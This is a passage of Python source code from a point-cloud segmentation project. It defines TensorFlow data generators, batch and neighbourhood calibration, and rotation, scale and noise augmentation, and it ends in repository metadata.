= self.val_data.prefetch(tf.data.experimental.AUTOTUNE)\n\n self.test_data = None\n if gen_function_test is not None:\n self.test_data = tf.data.Dataset.from_generator(gen_function_test, gen_types, gen_shapes)\n self.test_data = self.test_data.batch(config.batch_size_val if config.batch_size_val else config.batch_size)\n self.test_data = self.test_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n self.test_data = self.test_data.prefetch(tf.data.experimental.AUTOTUNE)\n\n # create a iterator of the correct shape and type\n iter = tf.data.Iterator.from_structure(self.train_data.output_types, self.train_data.output_shapes)\n # independent stream for each gpus\n self.flat_inputs = [iter.get_next() for i in range(config.gpu_num)]\n # create the initialisation operations\n self.train_init_op = iter.make_initializer(self.train_data)\n self.val_init_op = iter.make_initializer(self.val_data)\n self.test_init_op = iter.make_initializer(self.test_data) if self.test_data is not None else None\n\n\n def calibrate_batches(self, split=None, batch_size=None):\n s = 'training' if len(self.input_trees['training']) > 0 else 'test'\n split = split if split else s\n batch_size = batch_size if batch_size else self.config.batch_size\n\n N = (10000 // len(self.input_trees[split])) + 1\n sizes = []\n # Take a bunch of example neighborhoods in all clouds\n for i, tree in enumerate(self.input_trees[split]):\n # Randomly pick points\n points = np.array(tree.data, copy=False)\n rand_inds = np.random.choice(points.shape[0], size=N, replace=False)\n rand_points = points[rand_inds]\n noise = np.random.normal(scale=self.config.in_radius / 4, size=rand_points.shape)\n rand_points += noise.astype(rand_points.dtype)\n neighbors = tree.query_radius(points[rand_inds], r=self.config.in_radius)\n # Only save neighbors lengths\n sizes += [len(neighb) for neighb in neighbors]\n sizes = np.sort(sizes)\n # Higher bound for batch limit\n lim = sizes[-1] * batch_size\n # Biggest batch size with this limit\n sum_s = 0\n max_b = 0\n for i, s in enumerate(sizes):\n sum_s += s\n if sum_s > lim:\n max_b = i\n break\n # With a proportional corrector, find batch limit which gets the wanted batch_num\n estim_b = 0\n for i in range(10000):\n # Compute a random batch\n rand_shapes = np.random.choice(sizes, size=max_b, replace=False)\n b = np.sum(np.cumsum(rand_shapes) < lim)\n # Update estim_b (low pass filter istead of real mean\n estim_b += (b - estim_b) / min(i + 1, 100)\n # Correct batch limit\n lim += 10.0 * (self.config.batch_size - estim_b)\n return lim\n\n def calibrate_neighbors(self, split, keep_ratio=0.8, samples_threshold=10000):\n\n # Create a tensorflow input pipeline\n # **********************************\n import time\n config = self.config\n assert split in ['training', 'test']\n\n # From config parameter, compute higher bound of neighbors number in a neighborhood\n hist_n = int(np.ceil(4 / 3 * np.pi * (config.density_parameter + 1) ** 3))\n\n # Initiate neighbors limit with higher bound\n self.neighborhood_limits = np.full(config.num_layers, hist_n, dtype=np.int32)\n\n # Init batch limit if not done\n self.batch_limit = self.batch_limit if hasattr(self, 'batch_limit') else self.calibrate_batches()\n\n # Get mapping function\n gen_function, gen_types, gen_shapes = self.get_batch_gen_radius(split)\n kwargs = gen_function.kwargs if hasattr(gen_function, 'kwargs') else {}\n map_func = self.get_tf_mapping_radius(**kwargs)\n\n # Create batched dataset from generator\n train_data = tf.data.Dataset.from_generator(gen_function,\n gen_types,\n gen_shapes)\n\n train_data = train_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n\n # Prefetch data\n train_data = train_data.prefetch(10)\n\n # create a iterator of the correct shape and type\n iter = tf.data.Iterator.from_structure(train_data.output_types, train_data.output_shapes)\n flat_inputs = iter.get_next()\n\n # create the initialisation operations\n train_init_op = iter.make_initializer(train_data)\n\n # Create a local session for the calibration.\n cProto = tf.ConfigProto()\n cProto.gpu_options.allow_growth = True\n with tf.Session(config=cProto) as sess:\n\n # Init variables\n sess.run(tf.global_variables_initializer())\n\n # Initialise iterator with train data\n sess.run(train_init_op)\n\n # Get histogram of neighborhood sizes in 1 epoch max\n # **************************************************\n\n neighb_hists = np.zeros((config.num_layers, hist_n), dtype=np.int32)\n t0 = time.time()\n mean_dt = np.zeros(2)\n last_display = t0\n epoch = 0\n training_step = 0\n while epoch < 1 and np.min(np.sum(neighb_hists, axis=1)) < samples_threshold:\n try:\n\n # Get next inputs\n t = [time.time()]\n ops = flat_inputs['neighbors']\n neighbors = sess.run(ops)\n t += [time.time()]\n\n # Update histogram\n counts = [np.sum(neighb_mat < neighb_mat.shape[0], axis=1) for neighb_mat in neighbors]\n hists = [np.bincount(c, minlength=hist_n)[:hist_n] for c in counts]\n neighb_hists += np.vstack(hists)\n t += [time.time()]\n\n # Average timing\n mean_dt = 0.01 * mean_dt + 0.99 * (np.array(t[1:]) - np.array(t[:-1]))\n\n # Console display\n if (t[-1] - last_display) > 2.0:\n last_display = t[-1]\n message = 'Calib Neighbors {:08d} : timings {:4.2f} {:4.2f}'\n print(message.format(training_step, 1000 * mean_dt[0], 1000 * mean_dt[1]))\n\n training_step += 1\n\n except tf.errors.OutOfRangeError:\n print('End of train dataset')\n epoch += 1\n\n cumsum = np.cumsum(neighb_hists.T, axis=0)\n percentiles = np.sum(cumsum < (keep_ratio * cumsum[hist_n - 1, :]), axis=0)\n\n self.neighborhood_limits = percentiles\n print('neighborhood_limits : {}'.format(self.neighborhood_limits))\n\n return\n\n\n def init_sampling(self, split):\n ############\n # Parameters\n ############\n\n # Initiate parameters depending on the chosen split\n if split == 'training': # First compute the number of point we want to pick in each cloud set - num of samples\n epoch_n = self.config.epoch_steps * self.config.epoch_batch\n elif split == 'validation':\n epoch_n = self.config.validation_steps * self.config.epoch_batch\n elif split == 'test':\n epoch_n = self.config.validation_steps * self.config.epoch_batch\n elif split == 'ERF':\n # First compute the number of point we want to pick in each cloud and for each class\n epoch_n = 1000000\n self.batch_limit = 1 # BxN = 1, single point\n np.random.seed(42)\n split = 'test'\n else:\n raise ValueError('Split argument in data generator should be \"training\", \"validation\" or \"test\"')\n\n # Initiate potentials for regular generation\n if not hasattr(self, 'potentials'):\n self.potentials = {}\n self.min_potentials = {}\n\n # Reset potentials\n self.potentials[split] = []\n self.min_potentials[split] = []\n for i, tree in enumerate(self.input_trees[split]):\n self.potentials[split] += [np.random.rand(tree.data.shape[0]) * 1e-3]\n self.min_potentials[split] += [float(np.min(self.potentials[split][-1]))]\n\n return epoch_n\n\n\n def get_batch_gen_radius(self, split):\n \"\"\"\n A function defining the batch generator for each split. Should return the generator, the generated types and\n generated shapes\n :param split: string in \"training\", \"validation\" or \"test\"\n :param config: configuration file\n :return: gen_func, gen_types, gen_shapes\n \"\"\"\n\n config = self.config\n epoch_n = self.init_sampling(split)\n data_split = split\n batch_limit = self.batch_limit\n if split != 'training' and self.batch_limit_val:\n batch_limit = self.batch_limit_val\n\n ##########################\n # Def generators functions\n ##########################\n def spatially_regular_gen():\n\n # Initiate concatanation lists\n p_list = []\n c_list = []\n pl_list = []\n pi_list = []\n ci_list = []\n\n batch_n = 0\n\n # Generator loop\n for i in range(epoch_n):\n\n # Choose a random cloud\n cloud_ind = int(np.argmin(self.min_potentials[split]))\n\n # Choose point ind as minimum of potentials\n point_ind = np.argmin(self.potentials[split][cloud_ind])\n\n # Get points from tree structure\n points = np.array(self.input_trees[data_split][cloud_ind].data, copy=False)\n\n # Center point of input region\n center_point = points[point_ind, :].reshape(1, -1)\n\n # Add noise to the center point\n if split != 'ERF':\n noise = np.random.normal(scale=config.in_radius/10, size=center_point.shape)\n pick_point = center_point + noise.astype(center_point.dtype)\n else:\n pick_point = center_point\n\n # Indices of points in input region\n input_inds = self.input_trees[data_split][cloud_ind].query_radius(pick_point,\n r=config.in_radius)[0]\n\n # Number collected\n n = input_inds.shape[0]\n\n # Update potentials (Tuckey weights)\n if split != 'ERF':\n dists = np.sum(np.square((points[input_inds] - pick_point).astype(np.float32)), axis=1)\n tukeys = np.square(1 - dists / np.square(config.in_radius))\n tukeys[dists > np.square(config.in_radius)] = 0\n self.potentials[split][cloud_ind][input_inds] += tukeys\n self.min_potentials[split][cloud_ind] = float(np.min(self.potentials[split][cloud_ind]))\n\n # Safe check for very dense areas - align with training setting\n if n > self.batch_limit:\n input_inds = np.random.choice(input_inds, size=int(self.batch_limit)-1, replace=False)\n n = input_inds.shape[0]\n\n # Collect points and colors\n input_points = (points[input_inds] - pick_point).astype(np.float32)\n input_colors = self.input_colors[data_split][cloud_ind][input_inds]\n if split in ['test', 'ERF']:\n input_labels = np.zeros(input_points.shape[0])\n else:\n input_labels = self.input_labels[data_split][cloud_ind][input_inds]\n input_labels = self.label_to_idx[input_labels]\n # input_labels = np.array([self.label_to_idx[l] for l in input_labels])\n\n # In case batch is full, yield it and reset it\n if batch_n + n > batch_limit and batch_n > 0:\n yield (np.concatenate(p_list, axis=0), # [BxN, 3] - xyz in sample\n np.concatenate(c_list, axis=0), # [BxN, 3/1 + 3 (RGB/intensity + global xyz in whole cloud)]\n np.concatenate(pl_list, axis=0), # [BxN] - labels\n np.array([tp.shape[0] for tp in p_list]), # [B] - size (point num) of each batch\n np.concatenate(pi_list, axis=0), # [B, N] - point idx in each of its point cloud\n np.array(ci_list, dtype=np.int32)) # [B] - cloud idx\n\n p_list = []\n c_list = []\n pl_list = []\n pi_list = []\n ci_list = []\n batch_n = 0\n\n # Add data to current batch\n if n > 0:\n p_list += [input_points]\n c_list += [np.hstack((input_colors, input_points + pick_point))]\n pl_list += [input_labels]\n pi_list += [input_inds]\n ci_list += [cloud_ind]\n\n # Update batch size\n batch_n += n\n\n if batch_n > 0:\n yield (np.concatenate(p_list, axis=0),\n np.concatenate(c_list, axis=0),\n np.concatenate(pl_list, axis=0),\n np.array([tp.shape[0] for tp in p_list]),\n np.concatenate(pi_list, axis=0),\n np.array(ci_list, dtype=np.int32))\n spatially_regular_gen.types = (tf.float32, tf.float32, tf.int32, tf.int32, tf.int32, tf.int32)\n spatially_regular_gen.shapes = ([None, 3], [None, 6], [None], [None], [None], [None])\n\n # Define the generator that should be used for this split\n gen_func = config.data_gen if config.data_gen else 'spatially_regular_gen'\n gen_func = {\n 'spatially_regular_gen': spatially_regular_gen,\n }[gen_func]\n gen_types = tuple(gen_func.types)\n gen_shapes = tuple(gen_func.shapes)\n if hasattr(gen_func, 'init'): # extra init\n gen_func.init(split)\n\n return gen_func, gen_types, gen_shapes\n\n def get_batch_gen_fixed_size(self, split):\n\n epoch_n = self.init_sampling(split)\n\n def spatially_regular_gen():\n # Generator loop\n for i in range(epoch_n):\n\n # Choose a random cloud\n cloud_ind = int(np.argmin(self.min_potentials[split]))\n\n # Choose point ind as minimum of potentials\n point_ind = np.argmin(self.potentials[split][cloud_ind])\n\n # Get points from tree structure\n points = np.array(self.input_trees[split][cloud_ind].data, copy=False)\n\n # Center point of input region\n center_point = points[point_ind, :].reshape(1, -1)\n\n # Add noise to the center point\n noise = np.random.normal(scale=self.config.noise_init / 10, size=center_point.shape)\n pick_point = center_point + noise.astype(center_point.dtype)\n\n # Check if the number of points in the selected cloud is less than the predefined num_points\n k = min(len(points), self.config.in_points)\n\n # Query all points / the predefined number within the cloud\n dists, input_inds = self.input_trees[split][cloud_ind].query(pick_point, k=k)\n input_inds = input_inds[0]\n\n # Shuffle index\n np.random.shuffle(input_inds)\n\n # Collect points and colors\n input_points = (points[input_inds] - pick_point).astype(np.float32)\n input_colors = self.input_colors[split][cloud_ind][input_inds]\n if split == 'test':\n input_labels = np.zeros(input_points.shape[0])\n else:\n input_labels = self.input_labels[split][cloud_ind][input_inds]\n input_labels = self.label_to_idx[input_labels]\n\n # Update potentials (Tuckey weights)\n # TODO: using dist from tree query ???\n # assert np.all(np.abs(dists ** 2 - np.sum(np.square((points[input_inds] - pick_point).astype(np.float32)), axis=1)) < 1e-9)\n dists = np.sum(np.square((points[input_inds] - pick_point).astype(np.float32)), axis=1)\n tukeys = np.square(1 - dists / dists.max())\n # # weighted update\n # tukeys_cls_w = class_weight[split][input_labels] if split == 'train' else 1 # per-pt class weight\n self.potentials[split][cloud_ind][input_inds] += tukeys\n self.min_potentials[split][cloud_ind] = float(np.min(self.potentials[split][cloud_ind]))\n\n # up_sampled with replacement\n if len(input_points) < self.config.in_points:\n dup_idx = np.random.choice(len(points), self.config.in_points - len(points))\n dup_idx = np.concatenate([np.arange(len(points)), dup_idx]) # [original, dup]\n input_points = input_points[dup_idx]\n input_colors = input_colors[dup_idx]\n input_labels = input_labels[dup_idx]\n input_inds = input_inds[dup_idx]\n\n # sampled point cloud\n yield (input_points.astype(np.float32), # centered xyz\n np.hstack([input_colors, input_points + pick_point]).astype(np.float32), # colors, original xyz\n input_labels, # label\n input_inds.astype(np.int32), # points idx in cloud\n int(cloud_ind) # cloud idx\n # np.array([cloud_ind], dtype=np.int32)\n )\n\n # Define the generator that should be used for this split\n valid_split = ('training', 'validation', 'test')\n assert split in valid_split, ValueError(f'invalid split = {split} not in {valid_split}')\n\n # Define generated types and shapes\n gen_func = spatially_regular_gen\n gen_types = (tf.float32, tf.float32, tf.int32, tf.int32, tf.int32)\n # N = None\n N = self.config.in_points\n gen_shapes = ([N, 3], [N, 6], [N], [N], []) # after batch : [B, N, 3], [B, N, 6], [B, N], [B, N], [B]\n # gen_shapes = ([N, 3], [N, 6], [N], [N], [1])\n return gen_func, gen_types, gen_shapes\n\n\n def tf_augment_input(self, stacked_points, batch_inds):\n \"\"\"\n Augment inputs with rotation, scale and noise\n Args:\n batch_inds : [BxN] - batch idx for each point\n \"\"\"\n # Parameter\n config = self.config\n num_batches = batch_inds[-1] + 1\n\n ##########\n # Rotation\n ##########\n if config.augment_rotation == 'none':\n R = tf.eye(3, batch_shape=(num_batches,)) # [BxN, 3, 3]\n elif config.augment_rotation == 'vertical': # -- used in default cfgs\n # Choose a random angle for each element\n theta = tf.random.uniform((num_batches,), minval=0, maxval=2 * np.pi)\n # Rotation matrices\n c, s = tf.cos(theta), tf.sin(theta)\n cs0 = tf.zeros_like(c)\n cs1 = tf.ones_like(c)\n R = tf.stack([c, -s, cs0, s, c, cs0, cs0, cs0, cs1], axis=1)\n R = tf.reshape(R, (-1, 3, 3)) # [B, 3, 3]\n # Create N x 3 x 3 rotation matrices to multiply with stacked_points\n stacked_rots = tf.gather(R, batch_inds) # [BxN, 3, 3]\n # Apply rotations\n if len(stacked_rots.shape) == len(stacked_points.shape):\n stacked_rots = tf.expand_dims(stacked_rots, axis=-3) # [BxN, 1, 3, 3] to match [B, N, 1, 3]\n stacked_points = tf.reshape(tf.matmul(tf.expand_dims(stacked_points, axis=-2), # to row vec: [BxN, 3] -> [BxN, 1, 3]\n stacked_rots),\n tf.shape(stacked_points))\n elif config.augment_rotation == 'arbitrarily':\n cs0 = tf.zeros((num_batches,))\n cs1 = tf.ones((num_batches,))\n # x rotation\n thetax = tf.random.uniform((num_batches,), minval=0, maxval=2 * np.pi)\n cx, sx = tf.cos(thetax), tf.sin(thetax)\n Rx = tf.stack([cs1, cs0, cs0, cs0, cx, -sx, cs0, sx, cx], axis=1)\n Rx = tf.reshape(Rx, (-1, 3, 3))\n # y rotation\n thetay = tf.random.uniform((num_batches,), minval=0, maxval=2 * np.pi)\n cy, sy = tf.cos(thetay), tf.sin(thetay)\n Ry = tf.stack([cy, cs0, -sy, cs0, cs1, cs0, sy, cs0, cy], axis=1)\n Ry = tf.reshape(Ry, (-1, 3, 3))\n # z rotation\n thetaz = tf.random.uniform((num_batches,), minval=0, maxval=2 * np.pi)\n cz, sz = tf.cos(thetaz), tf.sin(thetaz)\n Rz = tf.stack([cz, -sz, cs0, sz, cz, cs0, cs0, cs0, cs1], axis=1)\n Rz = tf.reshape(Rz, (-1, 3, 3))\n # whole rotation\n Rxy = tf.matmul(Rx, Ry)\n R = tf.matmul(Rxy, Rz)\n # Create N x 3 x 3 rotation matrices to multiply with stacked_points\n stacked_rots = tf.gather(R, batch_inds)\n # Apply rotations\n if len(stacked_rots.shape) < len(stacked_points.shape):\n stacked_rots = tf.expand_dims(stacked_rots, axis=-3) # [B, 1, 3, 3] to match [B, N, 1, 3]\n stacked_points = tf.reshape(tf.matmul(tf.expand_dims(stacked_points, axis=-2), stacked_rots), tf.shape(stacked_points))\n else:\n raise ValueError('Unknown rotation augmentation : ' + self.augment_rotation)\n\n #######\n # Scale\n #######\n # Choose random scales for each example\n min_s = config.augment_scale_min\n max_s = config.augment_scale_max\n if config.augment_scale_anisotropic: # each batch a scale - [B, 3/1]\n s = tf.random.uniform((num_batches, 3), minval=min_s, maxval=max_s) # xyz diff scale \n else:\n s = tf.random.uniform((num_batches, 1), minval=min_s, maxval=max_s) # xyz same scale\n symmetries = []\n for i in range(3):\n if config.augment_symmetries[i]: # could flip (multiply by 1/-1)\n symmetries.append(tf.round(tf.random.uniform((num_batches, 1))) * 2 - 1)\n else:\n symmetries.append(tf.ones([num_batches, 1], dtype=tf.float32))\n s *= tf.concat(symmetries, 1) # [B, 3]\n # Create N x 3 vector of scales to multiply with stacked_points\n stacked_scales = tf.gather(s, batch_inds) # [BxN, 3]\n # Apply scales\n if len(stacked_scales.shape) < len(stacked_points.shape):\n stacked_scales = tf.expand_dims(stacked_scales, axis=-2) # [B, 1, 3] to match [B, N, 3]\n stacked_points = stacked_points * stacked_scales\n\n #######\n # Noise\n #######\n noise = tf.random_normal(tf.shape(stacked_points), stddev=config.augment_noise) # per-point noise\n stacked_points = stacked_points + noise\n return stacked_points, s, R\n\n def tf_get_batch_inds(self, stacks_len):\n \"\"\"\n Method computing the batch indices of all points, given the batch element sizes (stack lengths). Example:\n From [3, 2, 5], it would return [0, 0, 0, 1, 1, 2, 2, 2, 2, 2]\n \"\"\"\n\n # Initiate batch inds tensor\n num_batches = tf.shape(stacks_len)[0]\n num_points = tf.reduce_sum(stacks_len)\n batch_inds_0 = tf.zeros((num_points,), dtype=tf.int32)\n\n # Define body of the while loop\n def body(batch_i, point_i, b_inds):\n num_in = stacks_len[batch_i]\n num_before = tf.cond(tf.less(batch_i, 1),\n lambda: tf.zeros((), dtype=tf.int32),\n lambda: tf.reduce_sum(stacks_len[:batch_i]))\n num_after = tf.cond(tf.less(batch_i, num_batches - 1),\n lambda: tf.reduce_sum(stacks_len[batch_i + 1:]),\n lambda: tf.zeros((), dtype=tf.int32))\n\n # Update current element indices\n inds_before = tf.zeros((num_before,), dtype=tf.int32)\n inds_in = tf.fill((num_in,), batch_i)\n inds_after = tf.zeros((num_after,), dtype=tf.int32)\n n_inds = tf.concat([inds_before, inds_in, inds_after], axis=0)\n\n b_inds += n_inds\n\n # Update indices\n point_i += stacks_len[batch_i]\n batch_i += 1\n\n return batch_i, point_i, b_inds\n\n def cond(batch_i, point_i, b_inds):\n return tf.less(batch_i, tf.shape(stacks_len)[0])\n\n _, _, batch_inds = tf.while_loop(cond,\n body,\n loop_vars=[0, 0, batch_inds_0],\n shape_invariants=[tf.TensorShape([]), tf.TensorShape([]),\n tf.TensorShape([None])])\n\n return batch_inds\n\n def tf_stack_batch_inds(self, stacks_len, tight=False):\n impl = self.config.tf_stack_batch_inds\n impl = impl if impl else 'while'\n impl = impl.replace('tf', '')\n return getattr(self, f'tf_stack_batch_inds_{impl}')(stacks_len, tight)\n\n def tf_stack_batch_inds_while(self, stacks_len, tight=False):\n \"\"\"\n Stack the flat point idx, given the batch element sizes (stacks_len)\n E.g. stacks_len = [3, 2, 5]; n = sum(stacks_len) = 10\n => return: [[0, 1, 2, n, n, n], \n [3, 4, n, n, n, n],\n [5, 6, 7, 8, 9, n]]\n \"\"\"\n # Initiate batch inds tensor\n num_points = tf.reduce_sum(stacks_len)\n max_points = tf.reduce_max(stacks_len)\n batch_inds_0 = tf.zeros((0, max_points), dtype=tf.int32)\n\n # Define body of the while loop\n def body(batch_i, point_i, b_inds):\n # Create this element indices\n element_inds = tf.expand_dims(tf.range(point_i, point_i + stacks_len[batch_i]), axis=0)\n # Pad to right size\n padded_inds = tf.pad(element_inds,\n [[0, 0], [0, max_points - stacks_len[batch_i]]],\n \"CONSTANT\",\n constant_values=num_points)\n # Concatenate batch indices\n b_inds = tf.concat((b_inds, padded_inds), axis=0)\n # Update indices\n point_i += stacks_len[batch_i]\n batch_i += 1\n return batch_i, point_i, b_inds\n\n def cond(batch_i, point_i, b_inds):\n return tf.less(batch_i, tf.shape(stacks_len)[0])\n\n fixed_shapes = [tf.TensorShape([]), tf.TensorShape([]), tf.TensorShape([None, None])]\n _, _, batch_inds = tf.while_loop(cond,\n body,\n loop_vars=[0, 0, batch_inds_0],\n shape_invariants=fixed_shapes)\n\n # Add a last column with shadow neighbor if there is not\n def f1(): return tf.pad(batch_inds, [[0, 0], [0, 1]], \"CONSTANT\", constant_values=num_points)\n def f2(): return batch_inds\n if not tight:\n batch_inds = tf.cond(tf.equal(num_points, max_points * tf.shape(stacks_len)[0]), true_fn=f1, false_fn=f2)\n\n return batch_inds\n\n def tf_stack_batch_inds_map(self, stacks_len, tight=False):\n # Initiate batch inds tensor\n B_inds = tf.range(tf.shape(stacks_len)[0]) # [B]\n num_points = tf.reduce_sum(stacks_len)\n max_points = tf.reduce_max(stacks_len)\n if not tight:\n max_points += 1\n def flatten_idx(batch_i):\n cur_len = stacks_len[batch_i]\n start_i = tf.reduce_sum(stacks_len[:batch_i])\n element_inds = tf.range(start_i, start_i + cur_len) # Create this element indices (starting at 0)\n padded_inds = tf.pad(element_inds, [[0, max_points - cur_len]], \"CONSTANT\", constant_values=num_points) # [max_points] Pad to right size\n return padded_inds\n batch_inds = tf.map_fn(flatten_idx, B_inds, dtype=tf.int32)\n return batch_inds\n\n def big_neighborhood_filter(self, neighbors, layer):\n \"\"\"\n Filter neighborhoods with max number of neighbors. Limit is set to keep XX% of the neighborhoods untouched.\n Limit is computed at initialization\n \"\"\"\n # crop neighbors matrix\n neighbors = neighbors[:, :self.neighborhood_limits[layer]]\n # neighbors = tf.reshape(neighbors, [-1, self.neighborhood_limits[layer]])\n return neighbors\n\n\n def tf_segmentation_inputs_radius(self,\n stacked_points,\n stacked_features,\n point_labels,\n stacks_lengths,\n batch_inds):\n from ops import get_tf_func\n tf_batch_subsampling = get_tf_func(self.config.sample, verbose=self.verbose)\n tf_batch_neighbors = get_tf_func(self.config.search, verbose=self.verbose)\n\n # Batch weight at each point for loss (inverse of stacks_lengths for each point)\n min_len = tf.reduce_min(stacks_lengths, keepdims=True)\n batch_weights = tf.cast(min_len, tf.float32) / tf.cast(stacks_lengths, tf.float32)\n stacked_weights = tf.gather(batch_weights, batch_inds)\n # Starting radius of convolutions\n dl = self.config.first_subsampling_dl\n dp = self.config.density_parameter\n r = dl * dp / 2.0\n # Lists of inputs\n num_layers = self.config.num_layers\n downsample_times = num_layers - 1\n input_points = [None] * num_layers\n input_neighbors = [None] * num_layers\n input_pools = [None] * num_layers\n input_upsamples = [None] * num_layers\n input_batches_len = [None] * num_layers\n\n input_upsamples[0] = tf.zeros((0, 1), dtype=tf.int32) # no upsample for input pt\n for dt in range(0, downsample_times): # downsample times\n neighbors_inds = tf_batch_neighbors(stacked_points, stacked_points, stacks_lengths, stacks_lengths, r)\n pool_points, pool_stacks_lengths = tf_batch_subsampling(stacked_points, stacks_lengths, sampleDl=2 * dl)\n pool_inds = tf_batch_neighbors(pool_points, stacked_points, pool_stacks_lengths, stacks_lengths, r)\n up_inds = tf_batch_neighbors(stacked_points, pool_points, stacks_lengths, pool_stacks_lengths, 2 * r)\n\n neighbors_inds = self.big_neighborhood_filter(neighbors_inds, dt)\n pool_inds = self.big_neighborhood_filter(pool_inds, dt)\n up_inds = self.big_neighborhood_filter(up_inds, dt)\n\n input_points[dt] = stacked_points\n input_neighbors[dt] = neighbors_inds\n input_pools[dt] = pool_inds\n input_upsamples[dt + 1] = up_inds\n input_batches_len[dt] = stacks_lengths\n stacked_points = pool_points\n stacks_lengths = pool_stacks_lengths\n r *= 2\n dl *= 2\n\n # last (downsampled) layer points\n neighbors_inds = tf_batch_neighbors(stacked_points, stacked_points, stacks_lengths, stacks_lengths, r)\n neighbors_inds = self.big_neighborhood_filter(neighbors_inds, downsample_times)\n input_points[downsample_times] = stacked_points\n input_neighbors[downsample_times] = neighbors_inds\n input_pools[downsample_times] = tf.zeros((0, 1), dtype=tf.int32)\n input_batches_len[downsample_times] = stacks_lengths\n\n # Batch unstacking (with first layer indices for optional classif loss) - in_batches - input stage\n stacked_batch_inds_0 = self.tf_stack_batch_inds(input_batches_len[0])\n # Batch unstacking (with last layer indices for optional classif loss) - out_batches - most down-sampled stage\n stacked_batch_inds_1 = self.tf_stack_batch_inds(input_batches_len[-1])\n\n # list of network inputs\n input_dict = {\n 'points': tuple(input_points),\n 'neighbors': tuple(input_neighbors),\n 'pools': tuple(input_pools),\n 'upsamples': tuple(input_upsamples),\n 'batches_len': tuple(input_batches_len),\n 'features': stacked_features,\n 'batch_weights': stacked_weights,\n 'in_batches': stacked_batch_inds_0,\n 'out_batches': stacked_batch_inds_1,\n 'point_labels': point_labels,\n }\n\n return input_dict\n\n def tf_segmentation_inputs_fixed_size(self, points, features, point_labels): # [B, N, 3], [B, N, d], [B, N]\n\n config = self.config\n assert config.sample in ['random', 'farthest'], f'not supported fixed-size sampling {self.config.sample}'\n assert config.search in ['knn'], f'not supported fixed-size neighbor searching {self.config.search}'\n sample_func = get_tf_func(config.sample, verbose=self.verbose)\n search_func = get_tf_func(config.search, verbose=self.verbose)\n\n num_layers = config.num_layers\n downsample_times = num_layers - 1\n\n # Lists of config\n k_search = config.kr_search if isinstance(config.kr_search, list) else [int(config.kr_search)] * num_layers # k-nn for at each layer (stage)\n k_sample = config.kr_sample if isinstance(config.kr_sample, list) else [int(config.kr_sample)] * downsample_times # k-nn for subsampling\n k_sample_up = config.kr_sample_up if isinstance(config.kr_sample_up, list) else [int(config.kr_sample_up)] * downsample_times # k-nn for upsampling\n r_sample = config.r_sample if isinstance(config.r_sample, list) else [int(config.r_sample)] * downsample_times # ratio for subsampling\n\n # Lists of inputs\n input_points = [None] * num_layers\n input_neighbors = [None] * num_layers\n input_pools = [None] * num_layers\n input_upsamples = [None] * num_layers\n input_batches_len = [None] * num_layers\n\n n_points = self.config.in_points # N at each layer (stage)\n input_upsamples[0] = tf.zeros((0, 1), dtype=tf.int32) # no upsample for input pt\n for dt in range(0, downsample_times):\n neighbors_inds = search_func(points, points, k_search[dt])\n pool_points = sample_func(points, n_points // r_sample[dt])\n # pool_points = tf.gather(points, down_inds, batch_dims=1)\n pool_inds = search_func(pool_points, points, k_sample[dt])\n up_inds = search_func(points, pool_points, k_sample_up[dt])\n\n input_points[dt] = points\n input_neighbors[dt] = neighbors_inds\n input_pools[dt] = pool_inds\n input_upsamples[dt + 1] = up_inds\n points = pool_points\n n_points = int(pool_points.shape[-2]) if isinstance(pool_points.shape[-2].value, int) else tf.shape(pool_points)[-2]\n\n # last (downsampled) layer points\n neighbors_inds = search_func(points, points, k_search[downsample_times])\n input_points[downsample_times] = points\n input_neighbors[downsample_times] = neighbors_inds\n input_pools[downsample_times] = tf.zeros((0, 1), dtype=tf.int32)\n\n # # Batch unstacking (with first layer indices for optional classif loss) - in_batches\n # stacked_batch_inds_0 = self.tf_stack_batch_inds(input_batches_len[0])\n # # Batch unstacking (with last layer indices for optional classif loss) - out_batches\n # stacked_batch_inds_1 = self.tf_stack_batch_inds(input_batches_len[-1])\n\n # list of network inputs\n input_dict = {\n 'points': tuple(input_points),\n 'neighbors': tuple(input_neighbors),\n 'pools': tuple(input_pools),\n 'upsamples': tuple(input_upsamples),\n # 'batches_len': tuple(input_batches_len),\n 'features': features,\n # 'batch_weights': stacked_weights,\n # 'in_batches': stacked_batch_inds_0,\n # 'out_batches': stacked_batch_inds_1,\n 'point_labels': point_labels,\n }\n\n return input_dict\n\n\n def get_class_cnt(self, split='train-val'):\n if hasattr(self, 'class_cnt'):\n return self.class_cnt\n class_cnt = np.zeros(self.num_classes)\n for s in split.split('-'):\n s = self.valid_split(s)\n for labels in self.input_labels[s]:\n idx, cnt = np.unique(labels, return_counts=True)\n idx = self.label_to_idx[idx].astype(int)\n mask = np.where(idx >= 0)\n idx = idx[mask]\n cnt = cnt[mask]\n class_cnt[idx] += cnt\n self.class_cnt = class_cnt\n return self.class_cnt\n", "repo_name": "LiyaoTang/contrastBoundary", "sub_path": "tensorflow/datasets/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 44177, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 117, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.sort", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 107, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 107, "usage_type": "attribute"}, 